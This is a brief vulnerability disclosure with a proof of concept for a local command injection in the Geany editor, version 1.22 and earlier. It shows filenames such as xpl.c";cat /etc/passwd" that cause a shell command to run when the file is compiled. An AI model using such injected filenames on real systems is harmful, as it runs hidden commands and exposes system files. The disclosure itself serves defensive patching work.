Geany <=1.22 Local Shell Command injection Vulnerability
Since that A.B.C.D = Command that will be injected.
POC:
Create a C file, any file, click save, the filename you put: xpl.c";A.B.C.D"
Now compile the file using Geany (Build-> Compile) (Or the shortcut F8), injected code ready.
Examples:
xpl.c";ls -la"
xpl.c";cat /etc/passwd"
推荐
评论(0条)
